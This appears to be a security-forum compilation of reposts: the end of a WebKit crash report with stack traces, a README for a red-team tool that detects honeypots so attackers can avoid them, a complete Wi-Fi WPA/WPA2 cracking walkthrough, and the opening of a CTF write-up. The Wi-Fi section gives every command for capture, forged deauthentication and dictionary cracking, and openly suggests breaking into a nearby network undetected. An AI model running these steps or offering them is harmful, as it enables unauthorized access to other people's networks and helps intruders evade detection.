(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x988170) #21 0x114665041 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x863041) #22 0x114674aaf in WebCore::DOMWindow::dispatchLoadEvent() 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x872aaf) #23 0x1145767af in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7747af) #24 0x114571103 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f103) #25 0x1149169ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce) #26 0x114913d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c) #27 0x11458f493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493) #28 0x114b035c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0) #29 0x11462e093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093) #30 0x1145ed386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386) #31 0x11407c997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997) #32 0x1140762aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa) #33 0x1169fdc41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41) #34 0x10ad232eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb) #35 0x10ad26689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689) #36 0x10ad25ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9) #37 0x10a5c6683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683) #38 0x10a3703b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5) #39 0x10a379888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888) #40 0x1203b0312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312) #41 0x1203b0d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41) #42 0x7fff8da4f3c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ 
(/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0) #43 0x7fff8da302cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc) #44 0x7fff8da2f7c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5) #45 0x7fff8da2f1c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3) #46 0x7fff8cf90ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) #47 0x7fff8cf90cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) #48 0x7fff8cf90b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) #49 0x7fff8b52be23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23) #50 0x7fff8bca785d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d) #51 0x7fff8b5207aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa) #52 0x7fff8b4eb1dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd) #53 0x7fffa33eb8c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6) #54 0x7fffa33ea2e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3) #55 0x10a28156c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c) #56 0x7fffa3192234 in start 
(/usr/lib/system/libdyld.dylib:x86_64+0x5234) 0x61200006a660 is located 24 bytes to the right of 264-byte region [0x61200006a540,0x61200006a648) allocated by thread T0 here: #0 0x10d26dd2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c) #1 0x7fffa3314281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281) #2 0x120401ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4) #3 0x1203f6c4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d) #4 0x12038c437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437) #5 0x12038b768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768) #6 0x11400c548 in WebCore::RenderObject::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20a548) #7 0x116bd7dbd in WebCore::RenderPtr<WebCore::RenderTextControlSingleLine> WebCore::createRenderer<WebCore::RenderTextControlSingleLine, WebCore::HTMLInputElement&, WebCore::RenderStyle>(WebCore::HTMLInputElement&&&, WebCore::RenderStyle&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dd5dbd) #8 0x116bd7d30 in WebCore::TextFieldInputType::createInputRenderer(WebCore::RenderStyle&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dd5d30) #9 0x114b57c46 in 
WebCore::HTMLInputElement::createElementRenderer(WebCore::RenderStyle&&, WebCore::RenderTreePosition const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd55c46) #10 0x1165cd605 in WebCore::RenderTreeUpdater::createRenderer(WebCore::Element&, WebCore::RenderStyle&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cb605) #11 0x1165cc2f7 in WebCore::RenderTreeUpdater::updateElementRenderer(WebCore::Element&, WebCore::Style::ElementUpdate const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca2f7) #12 0x1165cbc4d in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9c4d) #13 0x1165cb47b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b) #14 0x1145707e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9) #15 0x11458f478 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d478) #16 0x114b035c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0) #17 0x11462e093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093) #18 0x1145ed386 in WebCore::DocumentLoader::finishedLoading() 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386) #19 0x11407c997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997) #20 0x1140762aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa) #21 0x1169fdc41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41) #22 0x10ad232eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb) #23 0x10ad26689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689) #24 0x10ad25ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9) #25 0x10a5c6683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683) #26 0x10a3703b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5) #27 0x10a379888 in 
IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888) #28 0x1203b0312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312) #29 0x1203b0d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41) SUMMARY: AddressSanitizer: heap-buffer-overflow (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2694d46) in WTF::VectorBufferBase<WebCore::RecentSearch>::buffer() Shadow bytes around the buggy address: 0x1c240000d470: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x1c240000d480: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x1c240000d490: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa 0x1c240000d4a0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x1c240000d4b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x1c240000d4c0: 00 00 00 00 00 00 00 00 00 fa fa fa[fa]fa fa fa 0x1c240000d4d0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x1c240000d4e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1c240000d4f0: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa 0x1c240000d500: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x1c240000d510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==805==ABORTING This bug is subject to a 90 day disclosure 
deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Sursa: https://bugs.chromium.org/p/project-zero/issues/detail?id=1250
Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or on the host.

CodeExecution

Execute code on a target machine using Import-Module.

Invoke-HoneypotBuster

HoneypotBuster is a tool designed to spot honey tokens, honey breadcrumbs, and honeypots used by common distributed deception vendors. This tool will help spot the following deception techniques:

1. Kerberoasting Service Accounts Honey Tokens

Just like the one described in the ADSecurity article by Sean Metcalf, this tricks attackers into scanning for domain users with an assigned SPN (Service Principal Name) and the {adminCount = 1} LDAP attribute flag. So when you try to request a TGS for that user, you'll be exposed as a Kerberoasting attempt.

TGS definition: a ticket granting server (TGS) is a logical key distribution center (KDC) component that is used by the Kerberos protocol as a trusted third party.

2. Fake Computer Accounts Honey Pots

Creating many domain computer objects with no actual devices associated with them will confuse any attacker trying to study the network. Any attempt to perform lateral movement onto these fake objects will expose the attacker.

3. Fake Credentials Manager Credentials Breadcrumbs

Many deception vendors inject fake credentials into the Credentials Manager. These credentials will also be revealed by tools such as Mimikatz. Although they aren't real, attackers might mistake them for authentic credentials and use them.

4. Fake Domain Admins Accounts Honey Tokens

Creating several domain admins and credentials that have never been active is bad policy. These honey tokens lure attackers into brute-forcing domain admin credentials. Once someone tries to authenticate as such a user, an alarm is triggered and the attacker is revealed. Microsoft ATA uses this method.

5. Fake Mapped Drives Breadcrumbs

Many malicious automated scripts and worms spread via SMB shares, especially ones mapped as network drive shares. This tool will try to correlate some of the data collected earlier to identify any mapped drive related to a specific honeypot server.

6. DNS Records Manipulation Honey Pots

One method deception vendors use to detect fake endpoints is registering their DNS records toward the honeypot server. They can then point the attacker directly to their honeypot instead of an actual endpoint.

License

The Honeypot Buster project and all individual scripts are under the BSD 3-Clause license unless explicitly noted otherwise.

Usage

To install any of these modules, drop the PowerShell scripts into a directory and type:

Import-Module PathTo\scriptName.ps1

Then run the module from PowerShell. Refer to the comment-based help in each individual script for detailed usage information.

Sursa: https://github.com/JavelinNetworks/HoneypotBuster
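As an illustration of technique 1 above: the honey-token pattern it targets (a user with an SPN set and adminCount = 1) corresponds to an LDAP filter like the one built below. The attribute names come from Active Directory; the helper function itself is a hypothetical sketch, not part of HoneypotBuster:

```python
def kerberoast_honeytoken_filter():
    """Build the LDAP filter matching Kerberoastable "honey token" accounts:
    any user object that has a servicePrincipalName set and adminCount = 1."""
    clauses = [
        "(objectCategory=person)",
        "(objectClass=user)",
        "(servicePrincipalName=*)",  # account has an SPN -> Kerberoastable
        "(adminCount=1)",            # flagged as a (former) privileged account
    ]
    return "(&" + "".join(clauses) + ")"

print(kerberoast_honeytoken_filter())
```

An account matching this filter that has never logged on is a strong hint it exists only to bait TGS requests, which is exactly what Invoke-HoneypotBuster looks for.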
Wi-Fi Cracking

Crack WPA/WPA2 Wi-Fi routers with Airodump-ng and Aircrack-ng/Hashcat.

This is a brief walk-through tutorial that illustrates how to crack Wi-Fi networks that are secured using weak passwords. It is not exhaustive, but it should be enough information for you to test your own network's security or break into one nearby. The attack outlined below is entirely passive (listening only, nothing is broadcast from your computer) and it is impossible to detect provided that you don't actually use the password that you crack. An optional active deauthentication attack can be used to speed up the reconnaissance process and is described at the end of this document. If you are familiar with this process, you can skip the descriptions and jump to the list of commands used at the bottom.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use. Don't be a dick.

Getting Started

This tutorial assumes that you:

- Have a general comfort using the command line
- Are running a Debian-based Linux distro (preferably Kali Linux)
- Have Aircrack-ng installed: sudo apt-get install aircrack-ng
- Have a wireless card that supports monitor mode (I recommend this one. See here for more info.)

Cracking a Wi-Fi Network

Monitor Mode

Begin by listing wireless interfaces that support monitor mode with:

airmon-ng

If you do not see an interface listed then your wireless card does not support monitor mode. We will assume your wireless interface name is wlan0, but be sure to use the correct name if it differs from this. Next, we will place the interface into monitor mode:

airmon-ng start wlan0

Run iwconfig. You should now see a new monitor mode interface listed (likely mon0 or wlan0mon).

Find Your Target

Start listening to 802.11 beacon frames broadcast by nearby wireless routers using your monitor interface:

airodump-ng mon0

You should see output similar to what is below.

CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49

BSSID              PWR  Beacons  #Data, #/s  CH  MB    ENC   CIPHER AUTH  ESSID
14:91:82:F7:52:EB  -66  205       26    0    1   54e   OPN                belkin.2e8.guests
14:91:82:F7:52:E8  -64  212       56    0    1   54e   WPA2  CCMP   PSK   belkin.2e8
14:22:DB:1A:DB:64  -81   44        7    0    1   54    WPA2  CCMP         <length: 0>
14:22:DB:1A:DB:66  -83   48        0    0    1   54e.  WPA2  CCMP   PSK   steveserro
9C:5C:8E:C9:AB:C0  -81   19        0    0    3   54e   WPA2  CCMP   PSK   hackme
00:23:69:AD:AF:94  -82  350        4    0    1   54e   WPA2  CCMP   PSK   Kaitlin's Awesome
06:26:BB:75:ED:69  -84  232        0    0    1   54e.  WPA2  CCMP   PSK   HH2
78:71:9C:99:67:D0  -82  339        0    0    1   54e.  WPA2  CCMP   PSK   ARRIS-67D2
9C:34:26:9F:2E:E8  -85   40        0    0    1   54e.  WPA2  CCMP   PSK   Comcast_2EEA-EXT
BC:EE:7B:8F:48:28  -85  119       10    0    1   54e   WPA2  CCMP   PSK   root
EC:1A:59:36:AD:CA  -86  210       28    0    1   54e   WPA2  CCMP   PSK   belkin.dca

For the purposes of this demo, we will choose to crack the password of my network, "hackme". Remember the BSSID MAC address and channel (CH) number as displayed by airodump-ng, as we will need them both for the next step.

Capture a 4-way Handshake

WPA/WPA2 uses a 4-way handshake to authenticate devices to the network. You don't have to know anything about what that means, but you do have to capture one of these handshakes in order to crack the network password. These handshakes occur whenever a device connects to the network, for instance, when your neighbor returns home from work. We capture this handshake by directing airodump-ng to monitor traffic on the target network, using the channel and BSSID values discovered with the previous command.

# replace -c and --bssid values with the values of your target network
# -w specifies the directory where we will save the packet capture
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0

CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]

BSSID              PWR RXQ  Beacons  #Data, #/s  CH  MB   ENC   CIPHER AUTH  ESSID
9C:5C:8E:C9:AB:C0  -47   0      140       0   0   6  54e  WPA2  CCMP   PSK   ASUS

Now we wait...
Once you've captured a handshake, you should see something like [ WPA handshake: bc:d3:c9:ef:d2:67 at the top right of the screen, just right of the current time. If you are feeling impatient, and are comfortable using an active attack, you can force devices connected to the target network to reconnect, be sending malicious deauthentication packets at them. This often results in the capture of a 4-way handshake. See the deauth attack section below for info on this. Once you've captured a handshake, press ctrl-c to quit airodump-ng. You should see a .cap file wherever you told airodump-ng to save the capture (likely called -01.cap). We will use this capture file to crack the network password. I like to rename this file to reflect the network name we are trying to crack: mv ./-01.cap hackme.cap Crack the Network Password The final step is to crack the password using the captured handshake. If you have access to a GPU, I highly recommend using hashcat for password cracking. I've created a simple tool that makes hashcat super easy to use called naive-hashcat. If you don't have access to a GPU, there are various online GPU cracking services that you can use, like https://gpuhash.me/ or OnlineHashCrack. You can also try your hand at CPU cracking with Aircrack-ng. Note that both attack methods below assume a relatively weak user generated password. Most WPA/WPA2 routers come with strong 12 character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the Probable-Wordlists WPA-length dictionary files. Cracking With naive-hashcat (recommended) Before we can crack the password using naive-hashcat, we need to convert our .cap file to the equivalent hashcat file format .hccapx. You can do this easily by either uploading the .cap file to https://hashcat.net/cap2hccapx/ or using the cap2hccapx tool directly. 
cap2hccapx.bin hackme.cap hackme.hccapx

Next, download and run naive-hashcat:

# download
git clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat

# download the 134MB rockyou dictionary file
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

# crack ! baby ! crack !
# 2500 is the hashcat hash mode for WPA/WPA2
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh

Naive-hashcat uses various dictionary, rule, combination, and mask (smart brute-force) attacks, and it can take days or even months to run against mid-strength passwords. The cracked password will be saved to hackme.pot, so check this file periodically. Once you've cracked the password, you should see something like this as the contents of your POT_FILE:

e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet

Where the last two fields separated by : are the network name and password respectively.

If you would like to use hashcat without naive-hashcat see this page for info.

Cracking With Aircrack-ng

Aircrack-ng can be used for very basic dictionary attacks running on your CPU. Before you run the attack you need a wordlist. I recommend using the infamous rockyou dictionary file:

# download the 134MB rockyou dictionary file
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

Note that if the network password is not in the wordfile you will not crack the password.

# -a2 specifies WPA2, -b is the BSSID, -w is the wordfile
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap

If the password is cracked you will see a KEY FOUND! message in the terminal followed by the plain text version of the network password.

Aircrack-ng 1.2 beta3

[00:01:49] 111040 keys tested (1017.96 k/s)

KEY FOUND!
[ hacktheplanet ]

Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89 59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E

Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71 2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73 6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78 8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21

EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4

Deauth Attack

A deauth attack sends forged deauthentication packets from your machine to a client connected to the network you are trying to crack. These packets include fake "sender" addresses that make them appear to the client as if they were sent from the access point itself. Upon receipt of such packets, most clients disconnect from the network and immediately reconnect, providing you with a 4-way handshake if you are listening with airodump-ng.

Use airodump-ng to monitor a specific access point (using -c channel --bssid MAC) until you see a client (STATION) connected. A connected client looks something like this, where 64:BC:0C:48:97:F7 is the client MAC.

CH 6 ][ Elapsed: 2 mins ][ 2017-07-23 19:15 ]

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5C:8E:C9:AB:C0 -19 75 1043 144 10 6 54e WPA2 CCMP PSK ASUS

BSSID STATION PWR Rate Lost Frames Probe
9C:5C:8E:C9:AB:C0 64:BC:0C:48:97:F7 -37 1e- 1e 4 6479 ASUS

Now, leave airodump-ng running and open a new terminal. We will use the aireplay-ng command to send forged deauth packets to our victim client, forcing it to reconnect to the network and hopefully grabbing a handshake in the process.

# -0 10 specifies we would like to send 10 deauth packets
# -a is the MAC of the access point
# -c is the MAC of the client
aireplay-ng -0 10 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0

Once you've sent the deauth packets, head back over to your airodump-ng process, and with any luck you should now see something like this at the top right: [ WPA handshake: 9C:5C:8E:C9:AB:C0.
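For the curious, the frames aireplay-ng just injected are nothing exotic: an 802.11 deauthentication frame is a plain management frame (type 0, subtype 12) consisting of a 2-byte frame control field, a duration, three MAC addresses (receiver, transmitter, BSSID), a sequence field, and a 2-byte reason code. A byte-level sketch of the frame body follows; it omits the radiotap header and does no actual injection, and the duration value and reason code 7 ("class 3 frame from nonassociated station") are just illustrative choices:

```python
import struct

def deauth_frame(client_mac: str, ap_mac: str, reason: int = 7) -> bytes:
    """Build the 26-byte body of an 802.11 deauthentication frame."""
    mac = lambda m: bytes.fromhex(m.replace(":", ""))
    frame = struct.pack("<H", 0x00C0)   # frame control: mgmt type, subtype 12
    frame += struct.pack("<H", 0x013A)  # duration (illustrative value)
    frame += mac(client_mac)            # addr1: receiver (the client)
    frame += mac(ap_mac)                # addr2: transmitter, spoofed as the AP
    frame += mac(ap_mac)                # addr3: BSSID
    frame += struct.pack("<H", 0)       # sequence/fragment number
    frame += struct.pack("<H", reason)  # reason code
    return frame

f = deauth_frame("64:BC:0C:48:97:F7", "9C:5C:8E:C9:AB:C0")
print(len(f), f.hex())
```

Actually transmitting such a frame requires an interface in monitor mode with injection support, which is exactly what airmon-ng set up earlier.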
Now that you've captured a handshake you should be ready to crack the network password.

List of Commands

Below is a list of all of the commands needed to crack a WPA/WPA2 network, in order, with minimal explanation.

# put your network device into monitor mode
airmon-ng start wlan0

# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0

# start listening for the handshake
airodump-ng -c 6 --bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0

# optionally deauth a connected client to force a handshake
aireplay-ng -0 10 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0

########## crack password with aircrack-ng... ##########

# download 134MB rockyou.txt dictionary file if needed
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

# crack w/ aircrack-ng
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap

########## or crack password with naive-hashcat ##########

# convert cap to hccapx
cap2hccapx.bin capture/-01.cap capture/-01.hccapx

# crack with naive-hashcat
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh

Attribution

Much of the information presented here was gleaned from Lewis Encarnacion's awesome tutorial. Thanks also to the awesome authors and maintainers who work on Aircrack-ng and Hashcat.

Shout out to DrinkMoreCodeMore, hivie7510, hartzell, flennic, bhusang, and Shark0der who also provided suggestions and typo fixes on Reddit and GitHub. If you are interested in hearing some great proposed alternatives to WPA2, check out some of the great discussion on this Hacker News post.

Source: https://github.com/brannondorsey/wifi-cracking
picoCTF Write-up ~ Bypassing ASLR via Format String Bug

_py Apr 23

Hello folks! I hope you're all doing great. After a disgusting amount of trial and error, I present to you my solution for the console pwnable. Unfortunately, I did not solve the task on time but it was fun nevertheless. I decided to use this challenge as a way to introduce to you one of the ways you can bypass ASLR. If you have never messed with basic pwning, i.e. stack/buffer overflows, this write-up might not be your cup of tea. It'll be quite technical. Firstly I'll bombard you with theory and then we will move to the actual PoC/exploit, aka the all-time classic @_py way of explaining stuff. Let's dive right in, shall we?
